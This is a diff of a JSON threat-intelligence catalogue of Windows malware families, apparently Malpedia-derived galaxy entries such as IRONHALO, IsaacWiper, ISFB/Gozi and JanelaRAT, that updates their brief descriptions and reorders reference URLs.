+ "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user\u2019s Startup folder.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo",
+ "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html",
 "https://www.symantec.com/security-center/writeup/2015-122210-5128-99",
 "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html",
 "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html"
 ],
 "synonyms": [],
@@ -29116,36 +30509,36 @@
 "value": "IronNetInjector"
 },
 {
- "description": "",
+ "description": "According to Recorded Future, IsaacWiper is a destructive malware that overwrites all physical disks and logical volumes on a victim\u2019s machine.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.isaacwiper",
- "https://thehackernews.com/2022/03/second-new-isaacwiper-data-wiper.html",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
- "https://securityintelligence.com/posts/new-wiper-malware-used-against-ukranian-organizations/",
- "https://www.youtube.com/watch?v=mrTdSdMMgnk",
- "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
- "https://experience.mandiant.com/trending-evil-2/p/1",
- "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0324.pdf",
- "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
- "https://twitter.com/ESETresearch/status/1521910890072842240",
- "https://www.recordedfuture.com/isaacwiper-continues-trend-wiper-attacks-against-ukraine/",
 "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
- "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/",
- "https://www.brighttalk.com/webcast/15591/534324",
- "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
- "https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
- "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://experience.mandiant.com/trending-evil-2/p/1",
+ "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/",
+ "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
 "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/",
+ "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/",
+ "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
 "https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/",
- "https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/"
+ "https://thehackernews.com/2022/03/second-new-isaacwiper-data-wiper.html",
+ "https://twitter.com/ESETresearch/status/1521910890072842240",
+ "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/",
+ "https://securityboulevard.com/2022/03/isaacwiper-followed-hermeticwiper-attack-on-ukraine-orgs/",
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/",
+ "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine",
+ "https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works",
+ "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd",
+ "https://www.recordedfuture.com/isaacwiper-continues-trend-wiper-attacks-against-ukraine/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
+ "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/",
+ "https://www.brighttalk.com/webcast/15591/534324",
+ "https://www.youtube.com/watch?v=mrTdSdMMgnk",
+ "https://securityintelligence.com/posts/new-wiper-malware-used-against-ukranian-organizations/",
+ "https://go.recordedfuture.com/hubfs/reports/mtp-2022-0324.pdf"
 ],
 "synonyms": [
 "LASAINRAW"
@@ -29160,100 +30553,106 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb",
- "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
- "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
- "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
- "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0",
- "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle",
- "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/",
- "https://blog.group-ib.com/gozi-latest-ttps",
- "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html",
- "https://www.tgsoft.it/files/report/download.asp?id=568531345",
- "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html",
- "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/",
- "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/",
- "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
- "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
- "https://www.fidelissecurity.com/threatgeek/threat-intelligence/gozi-v3-technical-update/",
- "https://lokalhost.pl/gozi_tree.txt",
- "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/phishing-campaigns-featuring-ursnif-trojan/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
- "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html",
- "https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/",
- "https://www.youtube.com/watch?v=jlc7Ahp8Iqg",
- "https://github.com/mlodic/ursnif_beacon_decryptor",
- "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
 "https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy",
- "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245",
- "https://www.youtube.com/watch?v=KvOpNznu_3w",
- "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
- "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
- "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware",
- "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
- "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb",
- "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/",
- "https://www.cleafy.com/cleafy-labs/digital-banking-fraud-how-the-gozi-malware-work",
- "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif",
- "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features",
- "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html",
- "https://redcanary.com/resources/webinars/deep-dive-process-injection/",
- "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/",
- "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
- "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
- "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
- "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/05/08/ursnif-malware-banks-on-news-events-for-phishing-attacks",
 "https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef",
- "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/",
- "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
- "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/",
- "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/",
- "http://benkow.cc/DreambotSAS19.pdf",
+ "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/",
+ "https://securityintelligence.com/posts/ursnif-cerberus-android-malware-bank-transfers-italy/",
+ "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware",
 "https://blog.morphisec.com/ursnif/gozi-delivery-excel-macro-4.0-utilization-uptick-ocr-bypass",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15",
- "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
- "https://news.sophos.com/en-us/2019/12/24/gozi-v3-tracked-by-their-own-stealth/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
- "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
- "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/",
- "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/",
 "https://medium.com/walmartglobaltech/signed-dll-campaigns-as-a-service-7760ac676489",
+ "https://news.sophos.com/en-us/2019/12/24/gozi-v3-tracked-by-their-own-stealth/",
+ "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf",
+ "https://www.youtube.com/watch?v=KvOpNznu_3w",
+ "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/",
+ "https://0xtoxin.github.io/threat%20breakdown/Gozi-Italy-Campaign/",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features",
+ "https://www.cyberbit.com/new-ursnif-malware-variant/",
+ "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://github.com/mlodic/ursnif_beacon_decryptor",
+ "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/",
+ "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
+ "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/",
+ "https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/",
+ "https://www.proofpoint.com/us/blog/security-briefs/ta544-targets-italian-organizations-ursnif-malware",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/",
+ "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://lokalhost.pl/gozi_tree.txt",
+ "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/phishing-campaigns-featuring-ursnif-trojan/",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
+ "https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf",
+ "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/",
+ "https://www.youtube.com/watch?v=jlc7Ahp8Iqg",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html",
+ "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html",
+ "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/",
+ "https://www.hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
+ "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/",
+ "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/",
+ "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/",
+ "https://www.cleafy.com/cleafy-labs/digital-banking-fraud-how-the-gozi-malware-work",
+ "https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader",
+ "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
+ "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/",
+ "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
+ "https://www.tgsoft.it/files/report/download.asp?id=568531345",
+ "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
+ "https://insight-jp.nttsecurity.com/post/102i7af/steelclovergoogle",
+ "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
+ "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html",
+ "https://redcanary.com/resources/webinars/deep-dive-process-injection/",
+ "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html",
+ "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/",
+ "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html",
+ "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245",
+ "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
+ "https://www.fidelissecurity.com/threatgeek/threat-intelligence/gozi-v3-technical-update/",
+ "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
+ "http://benkow.cc/DreambotSAS19.pdf",
 "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
 "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
- "https://decoded.avast.io/vladimirmartyanov/zloader-the-silent-night/",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/",
- "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance",
+ "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
+ "https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/",
 "https://blog.fox-it.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/05/08/ursnif-malware-banks-on-news-events-for-phishing-attacks",
- "https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/",
- "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html",
- "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization",
- "https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf",
- "https://securityintelligence.com/posts/ursnif-cerberus-android-malware-bank-transfers-italy/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/",
- "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
- "https://www.hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/",
- "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf",
- "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb",
+ "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/",
+ "https://www.bridewell.com/insights/news/detail/hunting-for-ursnif",
+ "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html",
+ "https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/",
+ "https://www.proofpoint.com/us/blog/threat-insight/out-sandbox-wikiloader-digs-sophisticated-evasion",
+ "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0",
+ "https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/",
+ "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif",
+ "https://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072",
 "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/",
- "https://www.cyberbit.com/new-ursnif-malware-variant/",
- "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/",
- "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/",
 "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex",
- "https://www.proofpoint.com/us/blog/security-briefs/ta544-targets-italian-organizations-ursnif-malware"
+ "https://blog.group-ib.com/gozi-latest-ttps",
+ "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html",
+ "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15",
+ "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/",
+ "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
+ "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/"
 ],
 "synonyms": [
 "Gozi ISFB",
@@ -29270,11 +30669,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent",
- "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/",
 "http://www.clearskysec.com/ismagent/",
 "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia",
- "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
+ "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia"
 ],
 "synonyms": [],
 "type": []
@@ -29287,11 +30686,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor",
- "http://www.clearskysec.com/greenbug/",
- "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia",
+ "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
 "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon",
- "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon"
+ "https://unit42.paloaltonetworks.com/atoms/evasive-serpens/",
+ "http://www.clearskysec.com/greenbug/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia"
 ],
 "synonyms": [],
 "type": []
@@ -29318,8 +30717,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.israbye",
- "https://twitter.com/malwrhunterteam/status/1085162243795369984",
- "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/"
+ "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
+ "https://twitter.com/malwrhunterteam/status/1085162243795369984"
 ],
 "synonyms": [],
 "type": []
@@ -29345,13 +30744,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace",
- "https://wikileaks.org/vault7/document/2015-09-20150911-280-CSIT-15085-NfLog/2015-09-20150911-280-CSIT-15085-NfLog.pdf",
- "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/",
- "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
- "https://www.secureworks.com/research/threat-profiles/bronze-express",
 "https://www.secureworks.com/research/threat-profiles/bronze-overbrook",
+ "https://wikileaks.org/vault7/document/2015-09-20150911-280-CSIT-15085-NfLog/2015-09-20150911-280-CSIT-15085-NfLog.pdf",
+ "https://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/",
+ "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
 "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf",
- "https://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/"
+ "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-express"
 ],
 "synonyms": [
 "NfLog RAT"
@@ -29374,6 +30773,19 @@
 "uuid": "5710dffa-ec02-4e5c-848e-47af13f729d7",
 "value": "IXWare"
 },
+ {
+ "description": "According to Kaspersky Labs, this malware tool set has been used by APT group GoldenJackal, which has been observed since 2019 and which usually targets government and diplomatic entities in the Middle East and South Asia with espionage. It consists of multiple components and is written in .NET.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackal",
+ "https://securelist.com/goldenjackal-apt-group/109677/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "5f601f0a-13f7-40b5-9cf1-2eb50d5bad64",
+ "value": "Jackal"
+ },
 {
 "description": "",
 "meta": {
@@ -29391,12 +30803,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff",
- "https://clairelevin.github.io/malware/2023/02/14/jaff.html",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://intel471.com/blog/a-brief-history-of-ta505",
 "http://malware-traffic-analysis.net/2017/05/16/index.html",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart"
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart",
+ "https://clairelevin.github.io/malware/2023/02/14/jaff.html",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -29421,10 +30833,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku",
- "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146",
 "https://securelist.com/whos-really-spreading-through-the-bright-star/68978/",
+ "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf",
 "https://www.brighttalk.com/webcast/7451/538775",
- "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf"
+ "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146"
 ],
 "synonyms": [
 "C3PRO-RACOON",
@@ -29437,6 +30849,19 @@
 "uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112",
 "value": "Jaku"
 },
+ {
+ "description": "According to Zscaler, JanelaRAT is a heavily modified variant of BX RAT. Its focus is set on harvesting LATAM financial data and its method of extracting window titles for transmission underscores its targeted and stealthy nature. With an adaptive approach utilizing dynamic socket configuration and exploiting DLL side-loading from trusted sources, JanelaRAT poses a significant threat. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.janela_rat",
+ "https://www.zscaler.com/blogs/security-research/janelarat-repurposed-bx-rat-variant-targeting-latam-fintech"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d8455b0c-1d0b-4857-8e6a-abc6892cf7b9",
+ "value": "JanelaRAT"
+ },
 {
 "description": "",
 "meta": {
@@ -29452,14 +30877,14 @@
 "value": "Janeleiro"
 },
 {
- "description": "Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to “harvest” the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.",
